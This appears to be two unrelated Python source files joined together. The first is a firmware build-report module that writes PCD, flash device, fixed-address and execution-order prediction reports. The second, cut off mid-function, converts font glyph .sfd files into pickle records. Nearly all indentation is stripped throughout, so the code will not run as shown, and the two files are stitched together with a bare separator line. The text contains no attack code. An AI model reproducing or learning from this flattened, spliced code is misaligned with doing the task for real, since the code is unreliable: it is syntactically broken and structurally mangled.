OverrideFieldStruct = collections.OrderedDict()
if OverrideStruct:
for _, Values in OverrideStruct.items():
for Key,value in Values.items():
if value[1] and value[1].endswith('.dsc'):
OverrideFieldStruct[Key] = value
if Pcd.PcdFieldValueFromFdf:
for Key, Values in Pcd.PcdFieldValueFromFdf.items():
if Key in OverrideFieldStruct and Values[0] == OverrideFieldStruct[Key][0]:
continue
OverrideFieldStruct[Key] = Values
if Pcd.PcdFieldValueFromComm:
for Key, Values in Pcd.PcdFieldValueFromComm.items():
if Key in OverrideFieldStruct and Values[0] == OverrideFieldStruct[Key][0]:
continue
OverrideFieldStruct[Key] = Values
return OverrideFieldStruct
def PrintStructureInfo(self, File, Struct):
for Key, Value in sorted(Struct.items(), key=lambda x: x[0]):
if Value[1] and 'build command options' in Value[1]:
FileWrite(File, ' *B %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0]))
elif Value[1] and Value[1].endswith('.fdf'):
FileWrite(File, ' *F %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0]))
else:
FileWrite(File, ' %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0]))
def StrtoHex(self, value):
try:
value = hex(int(value))
return value
except:
if value.startswith("L\"") and value.endswith("\""):
valuelist = []
for ch in value[2:-1]:
valuelist.append(hex(ord(ch)))
valuelist.append('0x00')
return valuelist
elif value.startswith("\"") and value.endswith("\""):
return hex(ord(value[1:-1]))
elif value.startswith("{") and value.endswith("}"):
valuelist = []
if ',' not in value:
return value[1:-1]
for ch in value[1:-1].split(','):
ch = ch.strip()
if ch.startswith('0x') or ch.startswith('0X'):
valuelist.append(ch)
continue
try:
valuelist.append(hex(int(ch.strip())))
except:
pass
return valuelist
else:
return value
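    #
    # Illustrative examples of StrtoHex, following the branches above:
    #
    #   self.StrtoHex("16")          # -> '0x10'
    #   self.StrtoHex('L"Ab"')       # -> ['0x41', '0x62', '0x00']
    #   self.StrtoHex('"A"')         # -> '0x41'
    #   self.StrtoHex("{0x1, 2}")    # -> ['0x1', '0x2']
    #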
def IsStructurePcd(self, PcdToken, PcdTokenSpaceGuid):
if GlobalData.gStructurePcd and (self.Arch in GlobalData.gStructurePcd) and ((PcdToken, PcdTokenSpaceGuid) in GlobalData.gStructurePcd[self.Arch]):
return True
else:
return False
##
# Reports platform and module Prediction information
#
# This class reports the platform execution order prediction section and
# module load fixed address prediction subsection in the build report file.
#
class PredictionReport(object):
##
# Constructor function for class PredictionReport
#
# This constructor function generates PredictionReport object for the platform.
#
# @param self: The object pointer
# @param Wa Workspace context information
#
def __init__(self, Wa):
self._MapFileName = os.path.join(Wa.BuildDir, Wa.Name + ".map")
self._MapFileParsed = False
self._EotToolInvoked = False
self._FvDir = Wa.FvDir
self._EotDir = Wa.BuildDir
self._FfsEntryPoint = {}
self._GuidMap = {}
self._SourceList = []
self.FixedMapDict = {}
self.ItemList = []
self.MaxLen = 0
#
# Collect all platform reference source files and GUID C Name
#
for Pa in Wa.AutoGenObjectList:
for Module in Pa.LibraryAutoGenList + Pa.ModuleAutoGenList:
#
# BASE typed modules are EFI agnostic, so we need not scan
# their source code to find PPI/Protocol produce or consume
# information.
#
if Module.ModuleType == SUP_MODULE_BASE:
continue
#
# Add module referenced source files
#
self._SourceList.append(str(Module))
IncludeList = {}
for Source in Module.SourceFileList:
if os.path.splitext(str(Source))[1].lower() == ".c":
self._SourceList.append(" " + str(Source))
FindIncludeFiles(Source.Path, Module.IncludePathList, IncludeList)
for IncludeFile in IncludeList.values():
self._SourceList.append(" " + IncludeFile)
for Guid in Module.PpiList:
self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.PpiList[Guid])
for Guid in Module.ProtocolList:
self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.ProtocolList[Guid])
for Guid in Module.GuidList:
self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.GuidList[Guid])
if Module.Guid and not Module.IsLibrary:
EntryPoint = " ".join(Module.Module.ModuleEntryPointList)
RealEntryPoint = "_ModuleEntryPoint"
self._FfsEntryPoint[Module.Guid.upper()] = (EntryPoint, RealEntryPoint)
#
# Collect platform firmware volume list as the input of EOT.
#
self._FvList = []
if Wa.FdfProfile:
for Fd in Wa.FdfProfile.FdDict:
for FdRegion in Wa.FdfProfile.FdDict[Fd].RegionList:
if FdRegion.RegionType != BINARY_FILE_TYPE_FV:
continue
for FvName in FdRegion.RegionDataList:
if FvName in self._FvList:
continue
self._FvList.append(FvName)
for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
for Section in Ffs.SectionList:
try:
for FvSection in Section.SectionList:
if FvSection.FvName in self._FvList:
continue
self._FvList.append(FvSection.FvName)
except AttributeError:
pass
##
# Parse platform fixed address map files
#
# This function parses the platform final fixed address map file to get
    # the database of predicted fixed addresses for the module image base, entry
    # point, etc.
#
# @param self: The object pointer
#
def _ParseMapFile(self):
if self._MapFileParsed:
return
self._MapFileParsed = True
if os.path.isfile(self._MapFileName):
try:
FileContents = open(self._MapFileName).read()
for Match in gMapFileItemPattern.finditer(FileContents):
AddressType = Match.group(1)
BaseAddress = Match.group(2)
EntryPoint = Match.group(3)
Guid = Match.group(4).upper()
List = self.FixedMapDict.setdefault(Guid, [])
List.append((AddressType, BaseAddress, "*I"))
List.append((AddressType, EntryPoint, "*E"))
except:
EdkLogger.warn(None, "Cannot open file to read", self._MapFileName)
##
    # Invokes the EOT tool to get the predicted execution order.
#
# This function invokes EOT tool to calculate the predicted dispatch order
#
# @param self: The object pointer
#
def _InvokeEotTool(self):
if self._EotToolInvoked:
return
self._EotToolInvoked = True
FvFileList = []
for FvName in self._FvList:
FvFile = os.path.join(self._FvDir, FvName + ".Fv")
if os.path.isfile(FvFile):
FvFileList.append(FvFile)
if len(FvFileList) == 0:
return
#
# Write source file list and GUID file list to an intermediate file
# as the input for EOT tool and dispatch List as the output file
# from EOT tool.
#
SourceList = os.path.join(self._EotDir, "SourceFile.txt")
GuidList = os.path.join(self._EotDir, "GuidList.txt")
DispatchList = os.path.join(self._EotDir, "Dispatch.txt")
TempFile = []
for Item in self._SourceList:
FileWrite(TempFile, Item)
SaveFileOnChange(SourceList, "".join(TempFile), False)
TempFile = []
for Key in self._GuidMap:
FileWrite(TempFile, "%s %s" % (Key, self._GuidMap[Key]))
SaveFileOnChange(GuidList, "".join(TempFile), False)
try:
from Eot.EotMain import Eot
#
# Invoke EOT tool and echo its runtime performance
#
EotStartTime = time.time()
Eot(CommandLineOption=False, SourceFileList=SourceList, GuidList=GuidList,
FvFileList=' '.join(FvFileList), Dispatch=DispatchList, IsInit=True)
EotEndTime = time.time()
EotDuration = time.strftime("%H:%M:%S", time.gmtime(int(round(EotEndTime - EotStartTime))))
EdkLogger.quiet("EOT run time: %s\n" % EotDuration)
#
# Parse the output of EOT tool
#
for Line in open(DispatchList):
if len(Line.split()) < 4:
continue
(Guid, Phase, FfsName, FilePath) = Line.split()
Symbol = self._FfsEntryPoint.get(Guid, [FfsName, ""])[0]
if len(Symbol) > self.MaxLen:
self.MaxLen = len(Symbol)
self.ItemList.append((Phase, Symbol, FilePath))
        except Exception:
            EdkLogger.quiet("(Python %s on %s\n%s)" % (platform.python_version(), sys.platform, traceback.format_exc()))
            EdkLogger.warn(None, "Failed to generate execution order prediction report because an error occurred while executing EOT.")
##
# Generate platform execution order report
#
# This function generates the predicted module execution order.
#
# @param self The object pointer
# @param File The file object for report
#
def _GenerateExecutionOrderReport(self, File):
self._InvokeEotTool()
if len(self.ItemList) == 0:
return
FileWrite(File, gSectionStart)
FileWrite(File, "Execution Order Prediction")
FileWrite(File, "*P PEI phase")
FileWrite(File, "*D DXE phase")
FileWrite(File, "*E Module INF entry point name")
FileWrite(File, "*N Module notification function name")
FileWrite(File, "Type %-*s %s" % (self.MaxLen, "Symbol", "Module INF Path"))
FileWrite(File, gSectionSep)
for Item in self.ItemList:
FileWrite(File, "*%sE %-*s %s" % (Item[0], self.MaxLen, Item[1], Item[2]))
        FileWrite(File, gSectionEnd)
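    #
    # Illustrative sketch of an execution order entry (hypothetical modules): each
    # row combines the phase marker, the entry point or notification symbol, and
    # the module INF path:
    #
    #   # *PE  PeiMain    MdeModulePkg/Core/Pei/PeiMain.inf
    #   # *DE  DxeMain    MdeModulePkg/Core/Dxe/DxeMain.inf
    #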
##
# Generate Fixed Address report.
#
    # This function generates the predicted fixed address report for a module
# specified by Guid.
#
# @param self The object pointer
# @param File The file object for report
# @param Guid The module Guid value.
# @param NotifyList The list of all notify function in a module
#
def _GenerateFixedAddressReport(self, File, Guid, NotifyList):
self._ParseMapFile()
FixedAddressList = self.FixedMapDict.get(Guid)
if not FixedAddressList:
return
FileWrite(File, gSubSectionStart)
FileWrite(File, "Fixed Address Prediction")
FileWrite(File, "*I Image Loading Address")
FileWrite(File, "*E Entry Point Address")
FileWrite(File, "*N Notification Function Address")
FileWrite(File, "*F Flash Address")
FileWrite(File, "*M Memory Address")
FileWrite(File, "*S SMM RAM Offset")
FileWrite(File, "TOM Top of Memory")
FileWrite(File, "Type Address Name")
FileWrite(File, gSubSectionSep)
for Item in FixedAddressList:
Type = Item[0]
Value = Item[1]
Symbol = Item[2]
if Symbol == "*I":
Name = "(Image Base)"
elif Symbol == "*E":
Name = self._FfsEntryPoint.get(Guid, ["", "_ModuleEntryPoint"])[1]
elif Symbol in NotifyList:
Name = Symbol
Symbol = "*N"
else:
continue
if "Flash" in Type:
Symbol += "F"
elif "Memory" in Type:
Symbol += "M"
else:
Symbol += "S"
if Value[0] == "-":
Value = "TOM" + Value
FileWrite(File, "%s %-16s %s" % (Symbol, Value, Name))
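    #
    # Illustrative sketch of the fixed address rows emitted above (hypothetical
    # values): the symbol column combines *I/*E/*N with *F/*M/*S, and negative
    # map values are printed relative to Top of Memory (TOM):
    #
    #   # *IM  0x00001000        (Image Base)
    #   # *EM  0x00001240        _ModuleEntryPoint
    #   # *NS  TOM-0x00000400    SomeNotifyFunction    (hypothetical symbol)
    #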
##
# Generate report for the prediction part
#
    # This function generates the predicted fixed address report for a module or
    # the predicted module execution order for a platform.
    # If the input Guid is None, it generates the predicted module execution order;
    # otherwise it generates the fixed loading address report for the module
    # specified by Guid.
#
# @param self The object pointer
# @param File The file object for report
# @param Guid The module Guid value.
#
def GenerateReport(self, File, Guid):
if Guid:
self._GenerateFixedAddressReport(File, Guid.upper(), [])
else:
self._GenerateExecutionOrderReport(File)
##
# Reports FD region information
#
# This class reports the FD subsection in the build report file.
# It collects region information of platform flash device.
# If the region is a firmware volume, it lists the set of modules
# and its space information; otherwise, it only lists its region name,
# base address and size in its sub-section header.
# If there are nested FVs, the nested FVs will be listed immediately after
# this FD region subsection.
#
class FdRegionReport(object):
##
# Discover all the nested FV name list.
#
    # This is an internal worker function to discover all the nested FV information
    # in the parent firmware volume. It uses a depth-first search algorithm
    # recursively to find all the FV names and append them to the list.
#
# @param self The object pointer
# @param FvName The name of current firmware file system
# @param Wa Workspace context information
#
def _DiscoverNestedFvList(self, FvName, Wa):
FvDictKey=FvName.upper()
if FvDictKey in Wa.FdfProfile.FvDict:
for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
for Section in Ffs.SectionList:
try:
for FvSection in Section.SectionList:
if FvSection.FvName in self.FvList:
continue
self._GuidsDb[Ffs.NameGuid.upper()] = FvSection.FvName
self.FvList.append(FvSection.FvName)
self.FvInfo[FvSection.FvName] = ("Nested FV", 0, 0)
self._DiscoverNestedFvList(FvSection.FvName, Wa)
except AttributeError:
pass
##
# Constructor function for class FdRegionReport
#
# This constructor function generates FdRegionReport object for a specified FdRegion.
# If the FdRegion is a firmware volume, it will recursively find all its nested Firmware
# volume list. This function also collects GUID map in order to dump module identification
# in the final report.
#
# @param self: The object pointer
# @param FdRegion The current FdRegion object
# @param Wa Workspace context information
#
def __init__(self, FdRegion, Wa):
self.Type = FdRegion.RegionType
self.BaseAddress = FdRegion.Offset
self.Size = FdRegion.Size
self.FvList = []
self.FvInfo = {}
self._GuidsDb = {}
self._FvDir = Wa.FvDir
self._WorkspaceDir = Wa.WorkspaceDir
#
# If the input FdRegion is not a firmware volume,
# we are done.
#
if self.Type != BINARY_FILE_TYPE_FV:
return
#
# Find all nested FVs in the FdRegion
#
for FvName in FdRegion.RegionDataList:
if FvName in self.FvList:
continue
self.FvList.append(FvName)
self.FvInfo[FvName] = ("Fd Region", self.BaseAddress, self.Size)
self._DiscoverNestedFvList(FvName, Wa)
PlatformPcds = {}
#
# Collect PCDs declared in DEC files.
#
for Pa in Wa.AutoGenObjectList:
for Package in Pa.PackageList:
for (TokenCName, TokenSpaceGuidCName, DecType) in Package.Pcds:
DecDefaultValue = Package.Pcds[TokenCName, TokenSpaceGuidCName, DecType].DefaultValue
PlatformPcds[(TokenCName, TokenSpaceGuidCName)] = DecDefaultValue
#
# Collect PCDs defined in DSC file
#
for Pa in Wa.AutoGenObjectList:
for (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
DscDefaultValue = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)].DefaultValue
PlatformPcds[(TokenCName, TokenSpaceGuidCName)] = DscDefaultValue
#
# Add PEI and DXE a priori files GUIDs defined in PI specification.
#
self._GuidsDb[PEI_APRIORI_GUID] = "PEI Apriori"
self._GuidsDb[DXE_APRIORI_GUID] = "DXE Apriori"
#
# Add ACPI table storage file
#
self._GuidsDb["7E374E25-8E01-4FEE-87F2-390C23C606CD"] = "ACPI table storage"
for Pa in Wa.AutoGenObjectList:
for ModuleKey in Pa.Platform.Modules:
M = Pa.Platform.Modules[ModuleKey].M
InfPath = mws.join(Wa.WorkspaceDir, M.MetaFile.File)
self._GuidsDb[M.Guid.upper()] = "%s (%s)" % (M.Module.BaseName, InfPath)
#
# Collect the GUID map in the FV firmware volume
#
for FvName in self.FvList:
FvDictKey=FvName.upper()
if FvDictKey in Wa.FdfProfile.FvDict:
for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
try:
#
# collect GUID map for binary EFI file in FDF file.
#
Guid = Ffs.NameGuid.upper()
Match = gPcdGuidPattern.match(Ffs.NameGuid)
if Match:
PcdTokenspace = Match.group(1)
PcdToken = Match.group(2)
if (PcdToken, PcdTokenspace) in PlatformPcds:
GuidValue = PlatformPcds[(PcdToken, PcdTokenspace)]
Guid = GuidStructureByteArrayToGuidString(GuidValue).upper()
for Section in Ffs.SectionList:
try:
ModuleSectFile = mws.join(Wa.WorkspaceDir, Section.SectFileName)
self._GuidsDb[Guid] = ModuleSectFile
except AttributeError:
pass
except AttributeError:
pass
##
# Internal worker function to generate report for the FD region
#
    # This internal worker function generates the report for the FD region.
    # If the type is a firmware volume, it lists the offset and module identification.
#
# @param self The object pointer
# @param File The file object for report
# @param Title The title for the FD subsection
# @param BaseAddress The base address for the FD region
# @param Size The size of the FD region
# @param FvName The FV name if the FD region is a firmware volume
#
def _GenerateReport(self, File, Title, Type, BaseAddress, Size=0, FvName=None):
FileWrite(File, gSubSectionStart)
FileWrite(File, Title)
FileWrite(File, "Type: %s" % Type)
FileWrite(File, "Base Address: 0x%X" % BaseAddress)
if self.Type == BINARY_FILE_TYPE_FV:
FvTotalSize = 0
FvTakenSize = 0
FvFreeSize = 0
if FvName.upper().endswith('.FV'):
FileExt = FvName + ".txt"
else:
FileExt = FvName + ".Fv.txt"
if not os.path.isfile(FileExt):
FvReportFileName = mws.join(self._WorkspaceDir, FileExt)
if not os.path.isfile(FvReportFileName):
FvReportFileName = os.path.join(self._FvDir, FileExt)
try:
#
# Collect size info in the firmware volume.
#
FvReport = open(FvReportFileName).read()
Match = gFvTotalSizePattern.search(FvReport)
if Match:
FvTotalSize = int(Match.group(1), 16)
Match = gFvTakenSizePattern.search(FvReport)
if Match:
FvTakenSize = int(Match.group(1), 16)
FvFreeSize = FvTotalSize - FvTakenSize
#
# Write size information to the report file.
#
FileWrite(File, "Size: 0x%X (%.0fK)" % (FvTotalSize, FvTotalSize / 1024.0))
FileWrite(File, "Fv Name: %s (%.1f%% Full)" % (FvName, FvTakenSize * 100.0 / FvTotalSize))
FileWrite(File, "Occupied Size: 0x%X (%.0fK)" % (FvTakenSize, FvTakenSize / 1024.0))
FileWrite(File, "Free Size: 0x%X (%.0fK)" % (FvFreeSize, FvFreeSize / 1024.0))
FileWrite(File, "Offset Module")
FileWrite(File, gSubSectionSep)
#
# Write module offset and module identification to the report file.
#
OffsetInfo = {}
for Match in gOffsetGuidPattern.finditer(FvReport):
Guid = Match.group(2).upper()
OffsetInfo[Match.group(1)] = self._GuidsDb.get(Guid, Guid)
OffsetList = sorted(OffsetInfo.keys())
for Offset in OffsetList:
FileWrite (File, "%s %s" % (Offset, OffsetInfo[Offset]))
except IOError:
EdkLogger.warn(None, "Fail to read report file", FvReportFileName)
else:
FileWrite(File, "Size: 0x%X (%.0fK)" % (Size, Size / 1024.0))
FileWrite(File, gSubSectionEnd)
##
# Generate report for the FD region
#
# This function generates report for the FD region.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
if (len(self.FvList) > 0):
for FvItem in self.FvList:
Info = self.FvInfo[FvItem]
self._GenerateReport(File, Info[0], TAB_FV_DIRECTORY, Info[1], Info[2], FvItem)
else:
self._GenerateReport(File, "FD Region", self.Type, self.BaseAddress, self.Size)
##
# Reports FD information
#
# This class reports the FD section in the build report file.
# It collects flash device information for a platform.
#
class FdReport(object):
##
# Constructor function for class FdReport
#
# This constructor function generates FdReport object for a specified
# firmware device.
#
# @param self The object pointer
# @param Fd The current Firmware device object
# @param Wa Workspace context information
#
def __init__(self, Fd, Wa):
self.FdName = Fd.FdUiName
self.BaseAddress = Fd.BaseAddress
self.Size = Fd.Size
self.FdRegionList = [FdRegionReport(FdRegion, Wa) for FdRegion in Fd.RegionList]
self.FvPath = os.path.join(Wa.BuildDir, TAB_FV_DIRECTORY)
self.VPDBaseAddress = 0
self.VPDSize = 0
for index, FdRegion in enumerate(Fd.RegionList):
if str(FdRegion.RegionType) == 'FILE' and Wa.Platform.VpdToolGuid in str(FdRegion.RegionDataList):
self.VPDBaseAddress = self.FdRegionList[index].BaseAddress
self.VPDSize = self.FdRegionList[index].Size
break
##
# Generate report for the firmware device.
#
# This function generates report for the firmware device.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
FileWrite(File, gSectionStart)
FileWrite(File, "Firmware Device (FD)")
FileWrite(File, "FD Name: %s" % self.FdName)
FileWrite(File, "Base Address: %s" % self.BaseAddress)
FileWrite(File, "Size: 0x%X (%.0fK)" % (self.Size, self.Size / 1024.0))
if len(self.FdRegionList) > 0:
FileWrite(File, gSectionSep)
for FdRegionItem in self.FdRegionList:
FdRegionItem.GenerateReport(File)
if VPDPcdList:
VPDPcdList.sort(key=lambda x: int(x[2], 0))
FileWrite(File, gSubSectionStart)
FileWrite(File, "FD VPD Region")
FileWrite(File, "Base Address: 0x%X" % self.VPDBaseAddress)
FileWrite(File, "Size: 0x%X (%.0fK)" % (self.VPDSize, self.VPDSize / 1024.0))
FileWrite(File, gSubSectionSep)
for item in VPDPcdList:
# Add BaseAddress for offset
Offset = '0x%08X' % (int(item[2], 16) + self.VPDBaseAddress)
IsByteArray, ArrayList = ByteArrayForamt(item[-1])
Skuinfo = item[1]
if len(GlobalData.gSkuids) == 1 :
Skuinfo = GlobalData.gSkuids[0]
if IsByteArray:
FileWrite(File, "%s | %s | %s | %s | %s" % (item[0], Skuinfo, Offset, item[3], '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
FileWrite(File, "%s | %s | %s | %s | %s" % (item[0], Skuinfo, Offset, item[3], item[-1]))
FileWrite(File, gSubSectionEnd)
FileWrite(File, gSectionEnd)
##
# Reports platform information
#
# This class reports the whole platform information
#
class PlatformReport(object):
##
# Constructor function for class PlatformReport
#
# This constructor function generates a PlatformReport object for a platform build.
# It generates reports for the platform summary, flash, global PCDs and detailed
# module information for the modules involved in the platform build.
#
# @param self The object pointer
# @param Wa Workspace context information
# @param MaList The list of modules in the platform build
# @param ReportType The kind of report items in the final report file
#
def __init__(self, Wa, MaList, ReportType):
self._WorkspaceDir = Wa.WorkspaceDir
self.PlatformName = Wa.Name
self.PlatformDscPath = Wa.Platform
self.Architectures = " ".join(Wa.ArchList)
self.ToolChain = Wa.ToolChain
self.Target = Wa.BuildTarget
self.OutputPath = os.path.join(Wa.WorkspaceDir, Wa.OutputDir)
self.BuildEnvironment = platform.platform()
self.PcdReport = None
if "PCD" in ReportType:
self.PcdReport = PcdReport(Wa)
self.FdReportList = []
if "FLASH" in ReportType and Wa.FdfProfile and MaList is None:
for Fd in Wa.FdfProfile.FdDict:
self.FdReportList.append(FdReport(Wa.FdfProfile.FdDict[Fd], Wa))
self.PredictionReport = None
if "FIXED_ADDRESS" in ReportType or "EXECUTION_ORDER" in ReportType:
self.PredictionReport = PredictionReport(Wa)
self.DepexParser = None
if "DEPEX" in ReportType:
self.DepexParser = DepexParser(Wa)
self.ModuleReportList = []
if MaList is not None:
self._IsModuleBuild = True
for Ma in MaList:
self.ModuleReportList.append(ModuleReport(Ma, ReportType))
else:
self._IsModuleBuild = False
for Pa in Wa.AutoGenObjectList:
ModuleAutoGenList = []
for ModuleKey in Pa.Platform.Modules:
ModuleAutoGenList.append(Pa.Platform.Modules[ModuleKey].M)
if GlobalData.gFdfParser is not None:
if Pa.Arch in GlobalData.gFdfParser.Profile.InfDict:
INFList = GlobalData.gFdfParser.Profile.InfDict[Pa.Arch]
for InfName in INFList:
InfClass = PathClass(NormPath(InfName), Wa.WorkspaceDir, Pa.Arch)
Ma = ModuleAutoGen(Wa, InfClass, Pa.BuildTarget, Pa.ToolChain, Pa.Arch, Wa.MetaFile, Pa.DataPipe)
if Ma is None:
continue
if Ma not in ModuleAutoGenList:
ModuleAutoGenList.append(Ma)
for MGen in ModuleAutoGenList:
self.ModuleReportList.append(ModuleReport(MGen, ReportType))
##
# Generate report for the whole platform.
#
# This function generates a report of the platform information.
# It comprises platform summary, global PCD, flash and
# module list sections.
#
# @param self The object pointer
# @param File The file object for report
# @param BuildDuration The total time to build the modules
# @param AutoGenTime The total time of AutoGen Phase
# @param MakeTime The total time of Make Phase
# @param GenFdsTime The total time of GenFds Phase
# @param ReportType The kind of report items in the final report file
#
def GenerateReport(self, File, BuildDuration, AutoGenTime, MakeTime, GenFdsTime, ReportType):
FileWrite(File, "Platform Summary")
FileWrite(File, "Platform Name: %s" % self.PlatformName)
FileWrite(File, "Platform DSC Path: %s" % self.PlatformDscPath)
FileWrite(File, "Architectures: %s" % self.Architectures)
FileWrite(File, "Tool Chain: %s" % self.ToolChain)
FileWrite(File, "Target: %s" % self.Target)
if GlobalData.gSkuids:
FileWrite(File, "SKUID: %s" % " ".join(GlobalData.gSkuids))
if GlobalData.gDefaultStores:
FileWrite(File, "DefaultStore: %s" % " ".join(GlobalData.gDefaultStores))
FileWrite(File, "Output Path: %s" % self.OutputPath)
FileWrite(File, "Build Environment: %s" % self.BuildEnvironment)
FileWrite(File, "Build Duration: %s" % BuildDuration)
if AutoGenTime:
FileWrite(File, "AutoGen Duration: %s" % AutoGenTime)
if MakeTime:
FileWrite(File, "Make Duration: %s" % MakeTime)
if GenFdsTime:
FileWrite(File, "GenFds Duration: %s" % GenFdsTime)
FileWrite(File, "Report Content: %s" % ", ".join(ReportType))
if GlobalData.MixedPcd:
FileWrite(File, gSectionStart)
FileWrite(File, "The following PCDs use different access methods:")
FileWrite(File, gSectionSep)
for PcdItem in GlobalData.MixedPcd:
FileWrite(File, "%s.%s" % (str(PcdItem[1]), str(PcdItem[0])))
FileWrite(File, gSectionEnd)
if not self._IsModuleBuild:
if "PCD" in ReportType:
self.PcdReport.GenerateReport(File, None)
if "FLASH" in ReportType:
for FdReportListItem in self.FdReportList:
FdReportListItem.GenerateReport(File)
for ModuleReportItem in self.ModuleReportList:
ModuleReportItem.GenerateReport(File, self.PcdReport, self.PredictionReport, self.DepexParser, ReportType)
if not self._IsModuleBuild:
if "EXECUTION_ORDER" in ReportType:
self.PredictionReport.GenerateReport(File, None)
## BuildReport class
#
# This base class contains the routines to collect data and then
# apply a certain format to the output report
#
class BuildReport(object):
##
# Constructor function for class BuildReport
#
# This constructor function generates a BuildReport object for a platform build.
# It generates reports for the platform summary, flash, global PCDs and detailed
# module information for the modules involved in the platform build.
#
# @param self The object pointer
# @param ReportFile The file name to save report file
# @param ReportType The kind of report items in the final report file
#
def __init__(self, ReportFile, ReportType):
self.ReportFile = ReportFile
if ReportFile:
self.ReportList = []
self.ReportType = []
if ReportType:
for ReportTypeItem in ReportType:
if ReportTypeItem not in self.ReportType:
self.ReportType.append(ReportTypeItem)
else:
self.ReportType = ["PCD", "LIBRARY", "BUILD_FLAGS", "DEPEX", "HASH", "FLASH", "FIXED_ADDRESS"]
##
# Adds platform report to the list
#
# This function adds a platform report to the final report list.
#
# @param self The object pointer
# @param Wa Workspace context information
# @param MaList The list of modules in the platform build
#
def AddPlatformReport(self, Wa, MaList=None):
if self.ReportFile:
self.ReportList.append((Wa, MaList))
##
# Generates the final report.
#
# This function generates platform build report. It invokes GenerateReport()
# method for every platform report in the list.
#
# @param self The object pointer
# @param BuildDuration The total time to build the modules
# @param AutoGenTime The total time of AutoGen phase
# @param MakeTime The total time of Make phase
# @param GenFdsTime The total time of GenFds phase
#
def GenerateReport(self, BuildDuration, AutoGenTime, MakeTime, GenFdsTime):
if self.ReportFile:
try:
File = []
for (Wa, MaList) in self.ReportList:
PlatformReport(Wa, MaList, self.ReportType).GenerateReport(File, BuildDuration, AutoGenTime, MakeTime, GenFdsTime, self.ReportType)
Content = FileLinesSplit(''.join(File), gLineMaxLength)
SaveFileOnChange(self.ReportFile, Content, False)
EdkLogger.quiet("Build report can be found at %s" % os.path.abspath(self.ReportFile))
except IOError:
EdkLogger.error(None, FILE_WRITE_FAILURE, ExtraData=self.ReportFile)
except:
EdkLogger.error("BuildReport", CODE_ERROR, "Unknown fatal error when generating build report", ExtraData=self.ReportFile, RaiseError=False)
EdkLogger.quiet("(Python %s on %s\n%s)" % (platform.python_version(), sys.platform, traceback.format_exc()))
# This acts like the main() function for the script, unless it is 'import'ed into another script.
if __name__ == '__main__':
pass
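# A minimal usage sketch (kept as comments, since this module is normally driven by
# the build driver). The names Wa, BuildDuration, AutoGenTime, MakeTime and GenFdsTime
# below are assumed to come from the platform build and are hypothetical here:
#
#   Report = BuildReport("BuildReport.txt", ["PCD", "FLASH", "DEPEX"])
#   Report.AddPlatformReport(Wa)                 # queue the workspace for reporting
#   Report.GenerateReport(BuildDuration, AutoGenTime, MakeTime, GenFdsTime)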
|
write_data_to_pkl.py
|
import argparse
import multiprocessing as mp
import os
import pickle
import numpy as np
import svg_utils
'''
{'uni': int64, # unicode value of this glyph
'width': int64, # width of this glyph's viewport (provided by fontforge)
'vwidth': int64, # vertical width of this glyph's viewport
'sfd': binary/str, # glyph, converted to .sfd format, with a single SplineSet
'id': binary/str, # id of this glyph
'binary_fp': binary/str} # font identifier (provided in glyphazzn_urls.txt)
'''
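# A hypothetical example of a single record in the format documented above
# (values are illustrative only, not taken from the dataset):
#
#   example_glyph = {
#       'uni': 65,                              # unicode code point for 'A'
#       'width': 1000,                          # viewport width from fontforge
#       'vwidth': 1000,                         # vertical viewport width
#       'sfd': 'SplineSet\n...\nEndSplineSet',  # glyph outline in .sfd form
#       'id': '00',                             # glyph id within the font
#       'binary_fp': '0123456789abcdef',        # font identifier
#   }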
def create_db(opts):
print("Process sfd to pkl files ....")
all_font_ids = sorted(os.listdir(os.path.join(opts.sfd_path, opts.split)))
num_fonts = len(all_font_ids)
print(f"Number {opts.split} fonts before processing", num_fonts)
fonts_per_process = num_fonts // opts.num_processes
char_num = len(opts.alphabet)
def process(process_id):
cur_process_processed_font_glyphs = []
cur_process_log_file = open(os.path.join(opts.log_dir, f'{opts.split}_log_{process_id}.txt'), 'w')
cur_process_pkl_file = open(os.path.join(opts.output_path, opts.split, f'{opts.split}_{process_id:04d}-{opts.num_processes+1:04d}.pkl'), 'wb')
for i in range(process_id * fonts_per_process, (process_id + 1) * fonts_per_process):
if i >= num_fonts:
break
font_id = all_font_ids[i]
cur_font_sfd_dir = os.path.join(opts.sfd_path, opts.split, font_id)
cur_font_glyphs = []
# a whole font as an entry
for char_id in range(char_num):
if not os.path.exists(os.path.join(cur_font_sfd_dir, '{}_{:02d}.sfd'.format(font_id, char_id))):
break
char_desp_f = open(os.path.join(cur_font_sfd_dir, '{}_{:02d}.txt'.format(font_id, char_id)), 'r')
char_desp = char_desp_f.readlines()
sfd_f = open(os.path.join(cur_font_sfd_dir, '{}_{:02d}.sfd'.format(font_id, char_id)), 'r')
sfd = sfd_f.read()
uni = int(char_desp[0].strip())
width = int(char_desp[1].strip())
vwidth = int(char_desp[2].strip())
char_idx = char_desp[3].strip()
font_idx = char_desp[4].strip()
cur_glyph = {}
cur_glyph['uni'] = uni
cur_glyph['width'] = width
cur_glyph['vwidth'] = vwidth
cur_glyph['sfd'] = sfd
cur_glyph['id'] = char_idx
cur_glyph['binary_fp'] = font_idx
if not svg_utils.is_valid_glyph(cur_glyph):
msg = f"font {font_idx}, char {char_idx} is not a valid glyph\n"
cur_process_log_file.write(msg)
char_desp_f.close()
sfd_f.close()
# only keep fonts whose glyphs are all valid
break
pathunibfp = svg_utils.convert_to_path(cur_glyph)
if not svg_utils.is_valid_path(pathunibfp):
msg = f"font {font_idx}, char {char_idx}'s sfd is not a valid path\n"
cur_process_log_file.write(msg)
char_desp_f.close()
sfd_f.close()
break
example = svg_utils.create_example(pathunibfp)
cur_font_glyphs.append(example)
char_desp_f.close()
sfd_f.close()
if len(cur_font_glyphs) == char_num:
# only keep fonts whose glyphs are all valid
# merge the whole font
merged_res = {}
